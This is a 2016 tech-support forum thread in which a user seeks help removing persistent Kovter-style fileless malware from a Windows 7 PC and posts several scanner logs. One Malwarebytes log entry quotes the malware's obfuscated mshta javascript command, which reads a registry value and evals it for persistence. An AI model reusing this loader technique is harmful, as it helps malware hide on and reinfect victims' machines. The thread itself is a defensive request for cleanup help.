Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Rootkit.Fileless.MTGen & Mal/KovterLnk-A & Mal/KovterBat-A


  • This topic is locked This topic is locked
3 replies to this topic

#1 CGTIII

CGTIII

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:07:41 PM

Posted 16 November 2016 - 08:05 AM

Assistance appreciated. System became sluggish with long hesitations. What else should I check to make sure it's clean and how?

 

Thanks in advance.

 

Update 11/16 at 10PM: Just retested with Malwarebytes. All five items previously found are still there. Neither it nor Sophos removed them. Ugh!

 

Here are the logs:

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/15/2016
Scan Time: 11:03 PM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.16.02
Rootkit Database: v2016.10.31.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: cjerald

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 388632
Time Elapsed: 9 min, 38 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Warn
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\D122CD\SHELL

\OPEN\COMMAND, , [fbf7c000dac0ac8ae58b02d929d98080],

Registry Values: 3
Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT

\WINDOWS\CURRENTVERSION\RUN|^pmrnby, , [e30f4f71aeec3ff7a6c8d805e41ee719],
Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT

\WINDOWS\CURRENTVERSION\RUN|^wqgzvwnow, , [39b9c4fc841685b1ec83479609f97e82],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\d122cd\SHELL

\OPEN\COMMAND, "C:\Windows\system32\mshta.exe" "javascript:lM3Ob="kPSTs31";TA7=new

ActiveXObject("WScript.Shell");nuN9gf="3vv";so2bW=TA7.RegRead("HKCU\\software\\auux\

\onnlw");a94fzyq="RvaOBrg";eval(so2bW);PMyk2N="YI";", , [fbf7c000dac0ac8ae58b02d929d98080]

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 2
PUP.Optional.InstallCore, \\SPARTA\REDIRECTEDFOLDERS\SPARTA\REDIRECTEDFOLDERS\cjerald\MY

DOCUMENTS\downloads\PDFConverterSetup.exe, , [787a1ca4cad0a88e55f2fb3eca37f010],
Rootkit.Fileless.MTGen, C:\Users\cjerald\AppData\Local\322148\83934e.bat, ,

[b240ba06d1c94aec3eaf2374d82b58a8],

Physical Sectors: 0
(No malicious items detected)

(end)

# AdwCleaner v6.030 - Logfile created 16/11/2016 at 01:13:33
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-15.1 [Server]
# Operating System : Windows 7 Professional Service Pack 1 (X64)
# Username : cjerald - PC-8
# Running from : \\SPARTA\RedirectedFolders\cjerald\Desktop\adwcleaner_6.030.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****



***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\babylonbee.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\babylonbee.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

\\SPARTA\RedirectedFolders\cjerald\Desktop\AdwCleaner\AdwCleaner[C0].txt - [1242 Bytes] - [16/11/2016

01:13:33]
\\SPARTA\RedirectedFolders\cjerald\Desktop\AdwCleaner\AdwCleaner[S0].txt - [1639 Bytes] - [16/11/2016

01:08:51]

########## EOF - \\SPARTA\RedirectedFolders\cjerald\Desktop\AdwCleaner\AdwCleaner[C0].txt - [1468

Bytes] ##########

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 7 Professional x64
Ran by cjerald (Administrator) on Wed 11/16/2016 at  2:40:54.62
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 56

Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\1HKDD11L (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\3652F7ZL (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\38Q3BJNB (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\4A9JY292 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\4X7GRJQM (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\5N2ARVXK (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\6X9D1TY4 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\77ZF5T46 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\7SWM16S1 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\8BV90ZNI (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\8G7W3ZX1 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\D7HPXVZ5 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\D9K78EEG (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\F05JKPI9 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\FCHKSTD5 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\HMHCHBDL (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\I16WKLRC (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\KIG48OSE (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\LPU16NN4 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\LRYVGLKM (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\M9MOGTX9 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\MD6YHPL2 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\Q2K6ZCZ0 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\R71UV8QR (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\U1SR6BF1 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\X6CFLE3Y (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\YZ8XVWWW (Temporary Internet Files Folder)
Successfully deleted: C:\Users\cjerald\AppData\Local\Microsoft\Windows\Temporary Internet Files

\Content.IE5\ZASANXFR (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\1HKDD11L (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\3652F7ZL (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\38Q3BJNB (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\4A9JY292 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\4X7GRJQM (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\5N2ARVXK (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\6X9D1TY4 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\77ZF5T46 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\7SWM16S1 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\8BV90ZNI (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\8G7W3ZX1 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\D7HPXVZ5 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\D9K78EEG (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\F05JKPI9 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\FCHKSTD5 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\HMHCHBDL (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\I16WKLRC (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\KIG48OSE (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\LPU16NN4 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\LRYVGLKM (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\M9MOGTX9 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\MD6YHPL2 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\Q2K6ZCZ0 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\R71UV8QR (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\U1SR6BF1 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\X6CFLE3Y (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\YZ8XVWWW (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows

\Temporary Internet Files\Content.IE5\ZASANXFR (Temporary Internet Files Folder)

Registry: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 11/16/2016 at  2:46:45.49
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2016-11-16 07:55:15.486    Sophos Virus Removal Tool version 2.5.6
2016-11-16 07:55:15.486    Copyright © 2009-2016 Sophos Limited. All rights reserved.

2016-11-16 07:55:15.486    This tool will scan your computer for viruses and other threats. If it finds any, it

will give you the option to remove them.

2016-11-16 07:55:15.486    Windows version 6.1 SP 1.0 Service Pack 1 build 7601 SM=0x100 PT=0x1 WOW64
2016-11-16 07:55:15.486    Checking for updates...
2016-11-16 07:55:25.096    Update progress: proxy server not available
2016-11-16 07:55:31.632    Option all = no
2016-11-16 07:55:31.632    Option recurse = yes
2016-11-16 07:55:31.632    Option archive = no
2016-11-16 07:55:31.632    Option service = yes
2016-11-16 07:55:31.632    Option confirm = yes
2016-11-16 07:55:31.632    Option sxl = yes
2016-11-16 07:55:31.632    Option max-data-age = 35
2016-11-16 07:55:31.632    Option vdl-logging = yes
2016-11-16 07:55:31.648    Customer ID:    094260ca9b3af99f9d4a3909fc47a743
2016-11-16 07:55:31.648    Machine ID:    b452d6dc4eb64a91a759c04bd316660a
2016-11-16 07:55:31.663    Component SVRTcli.exe version 2.5.6
2016-11-16 07:55:31.663    Component control.dll version 2.5.6
2016-11-16 07:55:31.663    Component SVRTservice.exe version 2.5.6
2016-11-16 07:55:31.663    Component engine\osdp.dll version 1.44.1.2270
2016-11-16 07:55:31.663    Component engine\veex.dll version 3.67.0.2270
2016-11-16 07:55:31.663    Component engine\savi.dll version 9.0.5.2270
2016-11-16 07:55:31.679    Component rkdisk.dll version 1.5.31.1
2016-11-16 07:55:31.679    Version info:    Product version    2.5.6
2016-11-16 07:55:31.679    Version info:    Detection engine    3.67.0
2016-11-16 07:55:31.679    Version info:    Detection data    5.32
2016-11-16 07:55:31.679    Version info:    Build date    10/4/2016
2016-11-16 07:55:31.679    Version info:    Data files added    351
2016-11-16 07:55:31.679    Version info:    Last successful update    (not yet updated)
2016-11-16 07:55:38.574    Downloading updates...
2016-11-16 07:55:38.574    Update progress: [I96736] sdds.svrt_10: adding primary package C1A903B2-

E63E-483b-982D-04BB9C457C60 RECOMMENDED baseVersion=1
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.svrt_10: looking for packages included from

product C1A903B2-E63E-483b-982D-04BB9C457C60 RECOMMENDED path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.svrt_10: looking for supplements included from

product C1A903B2-E63E-483b-982D-04BB9C457C60 RECOMMENDED path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.savi0910.xml: found supplement SAVIW32

LATEST path= baseVersion= [included from product C1A903B2-E63E-483b-982D-04BB9C457C60

RECOMMENDED path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.savi0910.xml: looking for packages included from

product SAVIW32 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.savi0910.xml: looking for supplements included

from product SAVIW32 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.data0910.xml: found supplement IDE533

LATEST path= baseVersion= [included from product SAVIW32 LATEST path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.data0910.xml: looking for packages included

from product IDE533 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.data0910.xml: looking for supplements included

from product IDE533 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.data0910.xml: found supplement IDE534

LATEST path= baseVersion= [included from product IDE533 LATEST path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.data0910.xml: looking for packages included

from product IDE534 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.data0910.xml: looking for supplements included

from product IDE534 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.data0910.xml: found supplement IDE535

LATEST path= baseVersion= [included from product IDE534 LATEST path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.data0910.xml: looking for packages included

from product IDE535 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.data0910.xml: looking for supplements included

from product IDE535 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I49502] sdds.data0910.xml: found supplement IDE536

LATEST path= baseVersion= [included from product IDE535 LATEST path=]
2016-11-16 07:55:38.574    Update progress: [I95020] sdds.data0910.xml: looking for packages included

from product IDE536 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I22529] sdds.data0910.xml: looking for supplements included

from product IDE536 LATEST path=
2016-11-16 07:55:38.574    Update progress: [I19463] Syncing product C1A903B2-E63E-483b-982D-

04BB9C457C60 RECOMMENDED path=
2016-11-16 07:55:38.901    Update progress: [I19463] Syncing product SAVIW32 LATEST path=
2016-11-16 07:55:38.901    Update progress: [I19463] Product download size 151003858 bytes
2016-11-16 07:55:41.210    Update progress: [I19463] Syncing product IDE533 LATEST path=
2016-11-16 07:55:41.210    Update progress: [I19463] Product download size 2192549 bytes
2016-11-16 07:55:41.834    Update progress: [I19463] Syncing product IDE534 LATEST path=
2016-11-16 07:55:41.834    Update progress: [I19463] Product download size 2006903 bytes
2016-11-16 07:55:42.442    Update progress: [I19463] Syncing product IDE535 LATEST path=
2016-11-16 07:55:42.442    Update progress: [I19463] Product download size 643120 bytes
2016-11-16 07:55:42.505    Update progress: [I19463] Syncing product IDE536 LATEST path=
2016-11-16 07:55:42.552    Installing updates...
2016-11-16 07:55:43.160    Error level 1
2016-11-16 07:57:22.250    Update successful
2016-11-16 07:57:45.790    Option all = no
2016-11-16 07:57:45.790    Option recurse = yes
2016-11-16 07:57:45.790    Option archive = no
2016-11-16 07:57:45.790    Option service = yes
2016-11-16 07:57:45.790    Option confirm = yes
2016-11-16 07:57:45.790    Option sxl = yes
2016-11-16 07:57:45.790    Option max-data-age = 35
2016-11-16 07:57:45.790    Option vdl-logging = yes
2016-11-16 07:57:45.806    Customer ID:    094260ca9b3af99f9d4a3909fc47a743
2016-11-16 07:57:45.806    Machine ID:    b452d6dc4eb64a91a759c04bd316660a
2016-11-16 07:57:45.806    Component SVRTcli.exe version 2.5.6
2016-11-16 07:57:45.806    Component control.dll version 2.5.6
2016-11-16 07:57:45.806    Component SVRTservice.exe version 2.5.6
2016-11-16 07:57:45.806    Component engine\osdp.dll version 1.44.1.2270
2016-11-16 07:57:45.806    Component engine\veex.dll version 3.67.0.2270
2016-11-16 07:57:45.806    Component engine\savi.dll version 9.0.5.2270
2016-11-16 07:57:45.806    Component rkdisk.dll version 1.5.31.1
2016-11-16 07:57:45.806    Version info:    Product version    2.5.6
2016-11-16 07:57:45.806    Version info:    Detection engine    3.67.0
2016-11-16 07:57:45.806    Version info:    Detection data    5.32
2016-11-16 07:57:45.806    Version info:    Build date    10/4/2016
2016-11-16 07:57:45.806    Version info:    Data files added    351
2016-11-16 07:57:45.806    Version info:    Last successful update    11/16/2016 2:57:22 AM

2016-11-16 08:10:19.121    Could not open C:\hiberfil.sys
2016-11-16 08:10:25.922    Could not open C:\pagefile.sys
2016-11-16 08:43:23.038    Could not open C:\ProgramData\Symantec\Symantec Endpoint Protection

\12.1.4112.4156.105\Data\CmnClnt\_lck\_RDRPluginG
2016-11-16 08:43:23.038    Could not open C:\ProgramData\Symantec\Symantec Endpoint Protection

\12.1.4112.4156.105\Data\CmnClnt\_lck\_SNDPluginG
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{1ad435e9-aa72-11e6-b3a1-

001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{1bbe25d5-a5b5-11e6-b39e-

001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{1c725936-a68a-11e6-9b36-

001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{3808876b-c176-4e48-b7ae-

04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{578b4698-a4ed-11e6-8fda-

001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{918143a1-abc4-11e6-b3dc-

001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{9181533c-abc4-11e6-b3dc-

001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:43:35.502    Could not open C:\System Volume Information\{f304f19d-aabb-11e6-a8ad-

001e8cf5a0bc}{3808876b-c176-4e48-b7ae-04046e6cc752}
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file C:\Users\cjerald\AppData\Local

\322148\4c5510.lnk
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft

\Windows NT\CurrentVersion\Image File Execution Options\ehshell.exe
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft

\Windows NT\CurrentVersion\Image File Execution Options\ehshell.exe
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-

2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings

\WarnOnPostRedirect
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-

2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings

\WarnOnPostRedirect
2016-11-16 08:46:45.431    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft

\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file C:\Users\cjerald\AppData\Local

\322148\83934e.bat
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKLM\SOFTWARE\Microsoft

\Windows NT\CurrentVersion\Image File Execution Options\ehshell.exe
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKLM\SOFTWARE\Microsoft

\Windows NT\CurrentVersion\Image File Execution Options\ehshell.exe
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKU\S-1-5-21-3320201264-

2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings

\WarnOnPostRedirect
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKU\S-1-5-21-3320201264-

2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings

\WarnOnPostRedirect
2016-11-16 08:50:01.413    >>> Virus 'Mal/KovterBat-A' found in file HKLM\SOFTWARE\Microsoft

\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:38:17.741    >>> Virus 'Mal/KovterLnk-A' found in file C:\Windows\CSC

\v2.0.6\namespace\sparta\RedirectedFolders\cjerald\Start Menu\Programs\Startup\756f18.lnk
2016-11-16 09:38:17.741    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-

2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings

\WarnOnPostRedirect
2016-11-16 09:38:17.741    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-

2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings

\WarnOnPostRedirect
2016-11-16 09:38:17.741    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft

\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:41:33.707    >>> Virus 'Mal/KovterLnk-A' found in file C:\Windows\CSC

\v2.0.6\namespace\sparta\RedirectedFolders\cjerald\Start Menu\Programs\Startup\96da9b.lnk
2016-11-16 09:41:33.707    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-

2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings

\WarnOnPostRedirect
2016-11-16 09:41:33.707    >>> Virus 'Mal/KovterLnk-A' found in file HKU\S-1-5-21-3320201264-

2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Internet Settings

\WarnOnPostRedirect
2016-11-16 09:41:33.707    >>> Virus 'Mal/KovterLnk-A' found in file HKLM\SOFTWARE\Microsoft

\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
2016-11-16 09:48:40.240    Could not open C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608

-00C04FC295EE}\catdb
2016-11-16 09:48:40.240    Could not open C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5

-00C04FC295EE}\catdb
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\DEFAULT
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\SAM
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\SECURITY
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\SOFTWARE
2016-11-16 09:49:08.944    Could not open C:\Windows\System32\config\RegBack\SYSTEM
2016-11-16 10:23:11.984    Could not open LOGICAL:0003:00000000
2016-11-16 10:23:11.984    Could not open D:\
2016-11-16 10:23:44.651    The following items will be cleaned up:
2016-11-16 10:23:44.651    Mal/KovterLnk-A
2016-11-16 10:23:44.651    Mal/KovterBat-A
 


Edited by CGTIII, 16 November 2016 - 10:26 PM.


BC AdBot (Login to Remove)

 


#2 CGTIII

CGTIII
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:07:41 PM

Posted 19 November 2016 - 04:37 PM

Update:
Yesterday I also attempted current version of ComboFix, Malwarebytes Anti-Rootkit, and Panda Anti-rootkit. Still reappears in Malwarebytes afterward. (Rebooting after each, of course.)

Then tried Malwarebytes Anti-Rootkit, and Panda Anti-rootkit in Safe Mode. Rebooted after each. Still reappears in Malwarebytes afterward.

Also tried Sophos.

 

Today tried to manually remove the registry entries and .bat file. They reappeared within 2 seconds!

 

Help! Anybody there?

 

Here are the FRST logs:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-11-2016 01
Ran by CJerald (administrator) on PC-8 (19-11-2016 16:32:37)
Running from \\SPARTA\RedirectedFolders\cjerald\Desktop
Loaded Profiles: CJerald (Available Profiles: Clayton & CJerald)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\Slimjet\slimjet.exe" -- "%1")
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
() C:\Program Files (x86)\Backblaze\bzserv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
